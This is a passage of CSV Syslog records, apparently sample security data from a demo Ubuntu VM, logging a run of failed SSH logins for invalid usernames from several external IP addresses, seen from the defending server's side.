+17925,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:29:56,UbuntuDevEnv,2019-06-26 09:29:55,auth,UbuntuDevEnv,info,Failed password for invalid user waski from 118.24.90.122 port 62283 ssh2,71646,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,waski,118.24.90.1,62283,,
+17926,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:29:57,UbuntuDevEnv,2019-06-26 09:29:56,auth,UbuntuDevEnv,info,Received disconnect from 118.24.90.122 port 62283:11: Bye Bye [preauth],71646,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.24.90.1,62283,,
+17927,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:29:57,UbuntuDevEnv,2019-06-26 09:29:56,auth,UbuntuDevEnv,info,Disconnected from invalid user waski 118.24.90.122 port 62283 [preauth],71646,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,waski,118.24.90.1,62283,,
+17928,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:30:07,UbuntuDevEnv,2019-06-26 09:30:06,auth,UbuntuDevEnv,info,Invalid user minecraft from 187.6.249.142 port 43096,71730,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,minecraft,187.6.249.1,43096,,
+17929,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:30:07,UbuntuDevEnv,2019-06-26 09:30:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=187.6.249.142,71730,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,187.6.249.1,,0,
+17930,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:30:07,UbuntuDevEnv,2019-06-26 09:30:06,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,71730,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17931,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:30:09,UbuntuDevEnv,2019-06-26 09:30:09,auth,UbuntuDevEnv,info,Failed password for invalid user minecraft from 187.6.249.142 port 43096 ssh2,71730,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,minecraft,187.6.249.1,43096,,
+17932,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:30:09,UbuntuDevEnv,2019-06-26 09:30:09,auth,UbuntuDevEnv,info,Received disconnect from 187.6.249.142 port 43096:11: Bye Bye [preauth],71730,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,187.6.249.1,43096,,
+17933,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:30:09,UbuntuDevEnv,2019-06-26 09:30:09,auth,UbuntuDevEnv,info,Disconnected from invalid user minecraft 187.6.249.142 port 43096 [preauth],71730,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,minecraft,187.6.249.1,43096,,
+17934,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:30:17,UbuntuDevEnv,2019-06-26 09:30:17,auth,UbuntuDevEnv,info,Invalid user jacinta.cali from 176.31.202.90 port 52278,71779,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jacinta,176.31.202.9,52278,,
+17935,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:30:17,UbuntuDevEnv,2019-06-26 09:30:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,71779,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17936,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:30:17,UbuntuDevEnv,2019-06-26 09:30:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.202.90,71779,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.202.9,,0,
+17937,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:30:19,UbuntuDevEnv,2019-06-26 09:30:19,auth,UbuntuDevEnv,info,Failed password for invalid user jacinta.cali from 176.31.202.90 port 52278 ssh2,71779,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jacinta,176.31.202.9,52278,,
+17938,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:30:19,UbuntuDevEnv,2019-06-26 09:30:19,auth,UbuntuDevEnv,info,Received disconnect from 176.31.202.90 port 52278:11: Bye Bye [preauth],71779,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.202.9,52278,,
+17939,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:30:19,UbuntuDevEnv,2019-06-26 09:30:19,auth,UbuntuDevEnv,info,Disconnected from invalid user jacinta.cali 176.31.202.90 port 52278 [preauth],71779,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jacinta,176.31.202.9,52278,,
+17940,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:30:31,UbuntuDevEnv,2019-06-26 09:30:30,auth,UbuntuDevEnv,info,Invalid user fy from 176.31.43.255 port 38244,71884,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fy,176.31.43.2,38244,,
+17941,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:30:31,UbuntuDevEnv,2019-06-26 09:30:30,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,71884,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17942,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:30:31,UbuntuDevEnv,2019-06-26 09:30:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.43.255,71884,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.43.2,,0,
+17943,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:30:33,UbuntuDevEnv,2019-06-26 09:30:33,auth,UbuntuDevEnv,info,Failed password for invalid user fy from 176.31.43.255 port 38244 ssh2,71884,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fy,176.31.43.2,38244,,
+17944,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:30:33,UbuntuDevEnv,2019-06-26 09:30:33,auth,UbuntuDevEnv,info,Received disconnect from 176.31.43.255 port 38244:11: Bye Bye [preauth],71884,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.43.2,38244,,
+17945,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:30:33,UbuntuDevEnv,2019-06-26 09:30:33,auth,UbuntuDevEnv,info,Disconnected from invalid user fy 176.31.43.255 port 38244 [preauth],71884,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fy,176.31.43.2,38244,,
+17946,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:30:42,UbuntuDevEnv,2019-06-26 09:30:42,auth,UbuntuDevEnv,info,Invalid user ga from 118.24.90.122 port 7832,71926,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ga,118.24.90.1,7832,,
+17947,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:30:42,UbuntuDevEnv,2019-06-26 09:30:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.90.122,71926,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.90.1,,0,
+17948,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:30:42,UbuntuDevEnv,2019-06-26 09:30:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,71926,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17949,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:30:45,UbuntuDevEnv,2019-06-26 09:30:44,auth,UbuntuDevEnv,info,Failed password for invalid user ga from 118.24.90.122 port 7832 ssh2,71926,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ga,118.24.90.1,7832,,
+17950,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:30:45,UbuntuDevEnv,2019-06-26 09:30:44,auth,UbuntuDevEnv,info,Received disconnect from 118.24.90.122 port 7832:11: Bye Bye [preauth],71926,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.24.90.1,7832,,
+17951,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:30:45,UbuntuDevEnv,2019-06-26 09:30:44,auth,UbuntuDevEnv,info,Disconnected from invalid user ga 118.24.90.122 port 7832 [preauth],71926,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ga,118.24.90.1,7832,,
+17952,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:30:56,UbuntuDevEnv,2019-06-26 09:30:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=115.159.216.187  user=mysql,71969,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mysql,115.159.216.1,,0,
+17953,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:30:57,UbuntuDevEnv,2019-06-26 09:30:57,auth,UbuntuDevEnv,info,Failed password for mysql from 115.159.216.187 port 49783 ssh2,71969,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,115.159.216.1,49783,,
+17954,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:30:57,UbuntuDevEnv,2019-06-26 09:30:57,auth,UbuntuDevEnv,info,Received disconnect from 115.159.216.187 port 49783:11: Bye Bye [preauth],71969,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,115.159.216.1,49783,,
+17955,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:30:57,UbuntuDevEnv,2019-06-26 09:30:57,auth,UbuntuDevEnv,info,Disconnected from authenticating user mysql 115.159.216.187 port 49783 [preauth],71969,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,mysql,115.159.216.1,49783,,
+17956,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:31:16,UbuntuDevEnv,2019-06-26 09:31:15,auth,UbuntuDevEnv,info,Invalid user admin from 165.22.203.187 port 45930,72053,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,165.22.203.1,45930,,
+17957,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:31:16,UbuntuDevEnv,2019-06-26 09:31:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,72053,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17958,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:31:16,UbuntuDevEnv,2019-06-26 09:31:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.203.187,72053,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.203.1,,0,
+17959,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:31:18,UbuntuDevEnv,2019-06-26 09:31:17,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 165.22.203.187 port 45930 ssh2,72053,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,165.22.203.1,45930,,
+17960,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:31:18,UbuntuDevEnv,2019-06-26 09:31:17,auth,UbuntuDevEnv,info,Received disconnect from 165.22.203.187 port 45930:11: Bye Bye [preauth],72053,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.203.1,45930,,
+17961,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:31:18,UbuntuDevEnv,2019-06-26 09:31:17,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 165.22.203.187 port 45930 [preauth],72053,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,165.22.203.1,45930,,
+17962,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:31:31,UbuntuDevEnv,2019-06-26 09:31:31,auth,UbuntuDevEnv,info,Invalid user gast from 118.24.90.122 port 17034,72094,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gast,118.24.90.1,17034,,
+17963,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:31:31,UbuntuDevEnv,2019-06-26 09:31:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.90.122,72094,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.90.1,,0,
+17964,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:31:31,UbuntuDevEnv,2019-06-26 09:31:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,72094,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17965,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:31:33,UbuntuDevEnv,2019-06-26 09:31:33,auth,UbuntuDevEnv,info,Failed password for invalid user gast from 118.24.90.122 port 17034 ssh2,72094,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gast,118.24.90.1,17034,,
+17966,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:31:33,UbuntuDevEnv,2019-06-26 09:31:33,auth,UbuntuDevEnv,info,Received disconnect from 118.24.90.122 port 17034:11: Bye Bye [preauth],72094,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.24.90.1,17034,,
+17967,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:31:33,UbuntuDevEnv,2019-06-26 09:31:33,auth,UbuntuDevEnv,info,Disconnected from invalid user gast 118.24.90.122 port 17034 [preauth],72094,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gast,118.24.90.1,17034,,
+17968,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:31:47,UbuntuDevEnv,2019-06-26 09:31:47,auth,UbuntuDevEnv,info,Invalid user user from 176.31.202.90 port 40850,72162,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,176.31.202.9,40850,,
+17969,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:31:47,UbuntuDevEnv,2019-06-26 09:31:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.202.90,72162,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.202.9,,0,
+17970,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:31:47,UbuntuDevEnv,2019-06-26 09:31:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,72162,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17971,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:31:49,UbuntuDevEnv,2019-06-26 09:31:49,auth,UbuntuDevEnv,info,Failed password for invalid user user from 176.31.202.90 port 40850 ssh2,72162,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,176.31.202.9,40850,,
+17972,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:31:49,UbuntuDevEnv,2019-06-26 09:31:49,auth,UbuntuDevEnv,info,Received disconnect from 176.31.202.90 port 40850:11: Bye Bye [preauth],72162,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.202.9,40850,,
+17973,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:31:49,UbuntuDevEnv,2019-06-26 09:31:49,auth,UbuntuDevEnv,info,Disconnected from invalid user user 176.31.202.90 port 40850 [preauth],72162,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,176.31.202.9,40850,,
+17974,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:31:54,UbuntuDevEnv,2019-06-26 09:31:53,auth,UbuntuDevEnv,info,Invalid user automne from 176.31.43.255 port 45440,72185,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,automne,176.31.43.2,45440,,
+17975,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:31:54,UbuntuDevEnv,2019-06-26 09:31:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,72185,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17976,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:31:54,UbuntuDevEnv,2019-06-26 09:31:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.43.255,72185,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.43.2,,0,
+17977,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:31:55,UbuntuDevEnv,2019-06-26 09:31:55,auth,UbuntuDevEnv,info,Failed password for invalid user automne from 176.31.43.255 port 45440 ssh2,72185,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,automne,176.31.43.2,45440,,
+17978,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:31:55,UbuntuDevEnv,2019-06-26 09:31:55,auth,UbuntuDevEnv,info,Received disconnect from 176.31.43.255 port 45440:11: Bye Bye [preauth],72185,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.43.2,45440,,
+17979,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:31:55,UbuntuDevEnv,2019-06-26 09:31:55,auth,UbuntuDevEnv,info,Disconnected from invalid user automne 176.31.43.255 port 45440 [preauth],72185,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,automne,176.31.43.2,45440,,
+17980,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:32:00,UbuntuDevEnv,2019-06-26 09:32:00,auth,UbuntuDevEnv,info,Invalid user narcisse from 187.6.249.142 port 59992,72205,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,narcisse,187.6.249.1,59992,,
+17981,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:32:00,UbuntuDevEnv,2019-06-26 09:32:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=187.6.249.142,72205,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,187.6.249.1,,0,
+17982,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:32:00,UbuntuDevEnv,2019-06-26 09:32:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,72205,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17983,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:32:02,UbuntuDevEnv,2019-06-26 09:32:02,auth,UbuntuDevEnv,info,Failed password for invalid user narcisse from 187.6.249.142 port 59992 ssh2,72205,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,narcisse,187.6.249.1,59992,,
+17984,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:32:02,UbuntuDevEnv,2019-06-26 09:32:02,auth,UbuntuDevEnv,info,Disconnected from invalid user narcisse 187.6.249.142 port 59992 [preauth],72205,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,narcisse,187.6.249.1,59992,,
